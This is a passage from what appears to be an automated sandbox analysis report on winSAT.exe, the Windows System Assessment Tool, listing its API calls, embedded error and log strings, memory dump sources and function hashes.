                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB49A
                                                                                                                                                                                              • GetStringTypeExW.KERNEL32(?,?,?,?,00000000,?,?,?,?,00007FF780FA9232,?,?,?,?,?,00007FF780F9488F), ref: 00007FF780FAB4DF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$Type$Compare
                                                                                                                                                                                              • String ID: H$H$H$H$H$H
                                                                                                                                                                                              • API String ID: 1282904382-44074236
                                                                                                                                                                                              • Opcode ID: d2860e5df567cd592f624c12676c7f443a8a43b5c3bf6dbf9d88d8eaa2dbfbe2
                                                                                                                                                                                              • Instruction ID: 0ee02e082168dfffd3f6699a84af50ab10be69a6523610cea7e2ac5274586fe5
                                                                                                                                                                                              • Opcode Fuzzy Hash: d2860e5df567cd592f624c12676c7f443a8a43b5c3bf6dbf9d88d8eaa2dbfbe2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BB18126A0C64286EB61AF5294003BDA7A0FF05B4CFA89131DE4C577CADF3DE965C720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: SelectionNamespaces$base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot get a document node$cannot get owner document$cannot select nodes in an XML document$cannot set the %s document propert
                                                                                                                                                                                              • API String ID: 0-1340097815
                                                                                                                                                                                              • Opcode ID: ee123874ba9ef19f10c98c703b90a4676724e612ddcc3676dd04304a2e3e4e0e
                                                                                                                                                                                              • Instruction ID: ac94c8de15ce067156e4075b8a30cb23e545eb19a54bb5d8c86030a62fb4d392
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee123874ba9ef19f10c98c703b90a4676724e612ddcc3676dd04304a2e3e4e0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03915D36B18B46C5EB50AF26E8402B9B7A4FB49B94FA48135EE0D577A4DF3CE045C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$CountCreateCurrentInstanceProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: %s the WinSAT Task$Enabling$WinSAT$\Microsoft\Windows\Maintenance$base\winsat\common\winsatutilities.cpp$cannot disable/enable task, failed to connect to the TaskScheduler $cannot disable/enable task, failed to create a TaskScheduler object$cannot disable/enable task, failed to get set the enable state$cannot disable/enable task, failed to get the WinSAT task$cannot disable/enable task, failed to get the root task folder$cannot get the enabled property for the task
                                                                                                                                                                                              • API String ID: 619546231-3990694131
                                                                                                                                                                                              • Opcode ID: dfa6a0e90465db53b7db4930b33e531e2f56d5b046247ff75c090a9d7564862d
                                                                                                                                                                                              • Instruction ID: fb096bb0e9291df2f1094bf69be4007038632c6dd07eea0cf9fbf54fc7758c85
                                                                                                                                                                                              • Opcode Fuzzy Hash: dfa6a0e90465db53b7db4930b33e531e2f56d5b046247ff75c090a9d7564862d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 42817D26B08B46D5EB00AF64D8442B8A360FF89B59FA08232DE0D577A4EF7CE445C750
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Trace$CloseOpenProcess
                                                                                                                                                                                              • String ID: > WinSAT Run Time Log from : $%u total events, %u winsat events in %s$ERROR: $base\winsat\exe\viewlog.cpp$cannot open trace file '%s'$cannot process trace file '%s'
                                                                                                                                                                                              • API String ID: 1581262263-3466886758
                                                                                                                                                                                              • Opcode ID: 1aa5b261bec6f9c1f8717be8972d4a0f65d4c3af5bf8fd7b530e42a5bce4e457
                                                                                                                                                                                              • Instruction ID: 84052e068835fc3010012e90a4488821087674ff8ff827e3f5d1876a756caa26
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1aa5b261bec6f9c1f8717be8972d4a0f65d4c3af5bf8fd7b530e42a5bce4e457
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69B1C132A1CA4281EB50EF15E8442B9B761FB95BA0FA09235EE5D07BE4DF3CE542C750
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastfclosefgets$StringType_wfopenfeofmemchr
                                                                                                                                                                                              • String ID: Can't open input file '%s'$Error while reading from file%s$base\winsat\exe\textfileloader.cpp$the file name parameter is blank
                                                                                                                                                                                              • API String ID: 1146298180-1824773281
                                                                                                                                                                                              • Opcode ID: a5d997abdbf090e0c718df77b71bae92f6796c0e1cdff164775af6738c469b2d
                                                                                                                                                                                              • Instruction ID: 886601df0b953ed6610b5426b011f132cdac3c2dc8c591e051686f49cb3009e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5d997abdbf090e0c718df77b71bae92f6796c0e1cdff164775af6738c469b2d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F917E22B09A4295EB10AB22D8592BDA760FF45B94FE48631DE1E037D5DF7CE446C360
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: SelectionNamespaces$base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot get the root node for an XML documentt$cannot select the nodes for an XPATH expression$cannot set the %s document propert
                                                                                                                                                                                              • API String ID: 0-4173071205
                                                                                                                                                                                              • Opcode ID: 344c1d87c49b4cc25304665acb398d55c64c40e07f32c859fb482e852522e081
                                                                                                                                                                                              • Instruction ID: 70543c51a3beccafcf94f57e2108769eb1c728dfae3852d07108f5f2aab2849e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 344c1d87c49b4cc25304665acb398d55c64c40e07f32c859fb482e852522e081
                                                                                                                                                                                              • Instruction Fuzzy Hash: 21717F36608B45C6EB50DF25E8802B9B7A4FB89B94FA48235DE4E47BA4DF3CE145C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: SelectionNamespaces$base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot get the root node for an XML documentt$cannot select a XML node for from an XPATH expression$cannot set the %s document propert
                                                                                                                                                                                              • API String ID: 0-3823114410
                                                                                                                                                                                              • Opcode ID: 5587ea7196948a1c137b50669420a5ca430b0fe763d3b4b66f64253761f142de
                                                                                                                                                                                              • Instruction ID: f516c75c59b80239215e9a504c3d0788cefe4d8c555c771ae2de01efe3d6a577
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5587ea7196948a1c137b50669420a5ca430b0fe763d3b4b66f64253761f142de
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52716D36619B45C6E750DF29E8802B9B7A0FB49B94FA48235DE4D47BA4EF3CE005C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FA941C: SetLastError.KERNEL32 ref: 00007FF780FA944C
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD45
                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD69
                                                                                                                                                                                              • SetEndOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDD8E
                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDA9
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDC1
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDDDC
                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE11
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE24
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE37
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE47
                                                                                                                                                                                              • GetTimeFormatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF780FCE1A8), ref: 00007FF780FCDE77
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CriticalSectionTime$BuffersCloseCreateEnterErrorFlushFormatHandleLastLeaveLocalPointerSizeWrite
                                                                                                                                                                                              • String ID: --- START %d\%d\%d %S ---$AssessmentResultsPath$\winsat.log$base\winsat\exe\logging.cpp
                                                                                                                                                                                              • API String ID: 2715792050-1280026481
                                                                                                                                                                                              • Opcode ID: 97141c838bb258069ffa8586b84537cfda77fc034074ce0fa1bac6399e5eeb2e
                                                                                                                                                                                              • Instruction ID: 3f17553e01c083db53c98a87b7a0eb64a4ffeb302e8207e9837a8d53a7ce1f13
                                                                                                                                                                                              • Opcode Fuzzy Hash: 97141c838bb258069ffa8586b84537cfda77fc034074ce0fa1bac6399e5eeb2e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D614E31A08A12D6F710EB60E8512BDBB60FB85724FE09235DA5E427E4DF7CE549C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Handle$BuffCharCloseEnabledEventLowerProcessmemcpy$CountCreateCurrentDirectoryModulePathTempTickWindows_snprintf_s_vsnprintf_smemset
                                                                                                                                                                                              • String ID: Error: Failed to get a temporary filename.$Error: Failed to write temporary file to disk.$EventViewer XML is in: %ws$Events$Unable to launch %ws$WinsatEvents.xml$\system32\eventvwr.exe /v:$base\winsat\exe\main.cpp$xml
                                                                                                                                                                                              • API String ID: 3388235863-1156799286
                                                                                                                                                                                              • Opcode ID: d1a7413ee9af46f3d671843b40dadcf11f2f980e6f727eca213a842716f363ee
                                                                                                                                                                                              • Instruction ID: dc537c5519d3230a8c56216719efd9f6816b26cab97c66d7daafefe33b92f673
                                                                                                                                                                                              • Opcode Fuzzy Hash: d1a7413ee9af46f3d671843b40dadcf11f2f980e6f727eca213a842716f363ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: 42614F3261CB8291E720EB11E8502EAF7A0FBC5754FA05132D64D437A9DF7CE549CB50
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastPowerRequest$Close$ClearCreateHandleOpenQueryValue
                                                                                                                                                                                              • String ID: > Power 'execution' request successfully set.$> Power request 'execution' successfully cleared.$ERROR: Failure clearing power request. gle=0x%X$ERROR: Failure creating power request. gle=0x%X$ERROR: Failure setting power 'execution' request. gle=0x%X$PrivateError$WinSAT Execution$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1270214565-2098781763
                                                                                                                                                                                              • Opcode ID: 19c6dc01d55b9ff63c22c5e265f611d7003d0fc1af60f83bbc670fda52e359ee
                                                                                                                                                                                              • Instruction ID: e9a244f34405d5c2da79be6274c84eb084bda89a56f5186eee9bc7c12e3c3c5f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 19c6dc01d55b9ff63c22c5e265f611d7003d0fc1af60f83bbc670fda52e359ee
                                                                                                                                                                                              • Instruction Fuzzy Hash: C9517026A0C64296E710BB11E8401B9B760FB89B64FF48236DA5E437D6DF7CF445C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4993
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE49A0
                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE49CF
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4A0C
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4A73
                                                                                                                                                                                              • _wcsicmp.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4AA6
                                                                                                                                                                                              • _wcsicmp.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4AD6
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4B00
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: QueryValue_wcsicmpmemset$CloseOpen
                                                                                                                                                                                              • String ID: AMD$AuthenticAMD$GenuineIntel$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Intel$ProcessorNameString$VendorIdentifier
                                                                                                                                                                                              • API String ID: 2975432635-611722421
                                                                                                                                                                                              • Opcode ID: e77834c250519389a48a9871e6c04fd2ffdbe520e60981df5c78ebed55393083
                                                                                                                                                                                              • Instruction ID: ed623fc2b6a7a76424aea2ff9e800832d71aa2d542d9a7a21929a2db6991bdbe
                                                                                                                                                                                              • Opcode Fuzzy Hash: e77834c250519389a48a9871e6c04fd2ffdbe520e60981df5c78ebed55393083
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF419E32A08A428AE714AF21E8005BDB7A4FF89BA4FA59135DE0E87794DF7CE445C714
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$ErrorLastLibraryLoad
                                                                                                                                                                                              • String ID: WinSqmAddToStream$WinSqmEndSession$WinSqmIncrementDWORD$WinSqmSetDWORD$WinSqmSetString$WinSqmStartSession$ntdll.dll
                                                                                                                                                                                              • API String ID: 856020675-301278399
                                                                                                                                                                                              • Opcode ID: f392cd7565a561b76da92b53b3b24e83bf014fd482e2301691110f130ea9c12f
                                                                                                                                                                                              • Instruction ID: 529f9197a67ad8c99e6df25d7320ec28da4fea35addc187e29f1a6b7e5e684b6
                                                                                                                                                                                              • Opcode Fuzzy Hash: f392cd7565a561b76da92b53b3b24e83bf014fd482e2301691110f130ea9c12f
                                                                                                                                                                                              • Instruction Fuzzy Hash: D431D224D0EB0385EB44BB19B844074AAB1FF89745FF99231C84E467A0EFBDA005CB21
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID: Line %ld Col %ld%s$base\winsat\mlib\mxmldom.cpp$cannot add a reference$cannot add data to a collection$cannot create an IXMLDOMSchemaCollection object$cannot obtain the parsing error$cannot prarse XML%s$cannot query interface$cannot validate
                                                                                                                                                                                              • API String ID: 542301482-547904174
                                                                                                                                                                                              • Opcode ID: 43ceb852004110f727d426d82a36e942bca8109bcbbda124142c9d631394da0d
                                                                                                                                                                                              • Instruction ID: 81d9d31172f74fe0454f0f1754dd76aaad674cf89ecf81ca0a8f189a22d49eb8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 43ceb852004110f727d426d82a36e942bca8109bcbbda124142c9d631394da0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB12A36B08B0589EB109F65E8402ADB374FB88B98FA48236EE4D57BA4DF38D555C710
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast$EnvironmentExpandStrings
                                                                                                                                                                                              • String ID: %WINDIR%$%s\%s$%s\%s\%s$Performance$Performance\WinSAT\DataStore$WinSAT
                                                                                                                                                                                              • API String ID: 2004501331-642655616
                                                                                                                                                                                              • Opcode ID: df88417ab9d29162ffad2b92d4f8ac0863e3e6005e496ffa4c86ff66db028cb3
                                                                                                                                                                                              • Instruction ID: 06cf58c3cf89837a5e0c717af8338a8fc130777f2e567435e5782ef64deacb74
                                                                                                                                                                                              • Opcode Fuzzy Hash: df88417ab9d29162ffad2b92d4f8ac0863e3e6005e496ffa4c86ff66db028cb3
                                                                                                                                                                                              • Instruction Fuzzy Hash: FA417525B18B4387E720AB66E8402AAF7A4FF84754FE09132DA8DC6254DF7CE509C760
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Resource$System$EnabledEventMetrics__uncaught_exception$CountCurrentFindHandleLoadLockModulePowerProcessSizeofStatusTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: can't run '%S' assessment via a remote session$ERROR: the system transitioned from battery power during the assessment: assessment=%S$ERROR: the system transitioned to a terminal server session during a formal assessment$ERROR: the system transitioned to battery power during the formal assessment: assessment=%S$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 161303124-862004072
                                                                                                                                                                                              • Opcode ID: 00c3195bf1a61da81628a049c3b602dedfc2ebf5c1cd40469d2153e41b6ffa58
                                                                                                                                                                                              • Instruction ID: 27c602fe4716ebff2f35210054dc7ed3b0fd252e90bac89ff2341fb72ed3872f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 00c3195bf1a61da81628a049c3b602dedfc2ebf5c1cd40469d2153e41b6ffa58
                                                                                                                                                                                              • Instruction Fuzzy Hash: D9813920E2C64392EB40FB11E8506F9A761BF80754FE89035D94E4A7E2DF6CF54AD720
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorExceptionFileLastThrow$CriticalLibrarySection__uncaught_exception$CloseCreateDeleteEnterFormatFreeHandleLeaveLoadMessageWritevswprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 745374605-1364133637
                                                                                                                                                                                              • Opcode ID: 253144313a1973b1b284c158e500e21499505b5ab2f041c2de68d93efb0a7a3a
                                                                                                                                                                                              • Instruction ID: e9945ac8db2811c6dcab0f244babb07ea9198fb147244da932f7eaae436048bc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 253144313a1973b1b284c158e500e21499505b5ab2f041c2de68d93efb0a7a3a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71813E32A18A4286EB50EF11E8543F9B760FB88B54FA09135EA5E477E5DF3CE505CB20
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
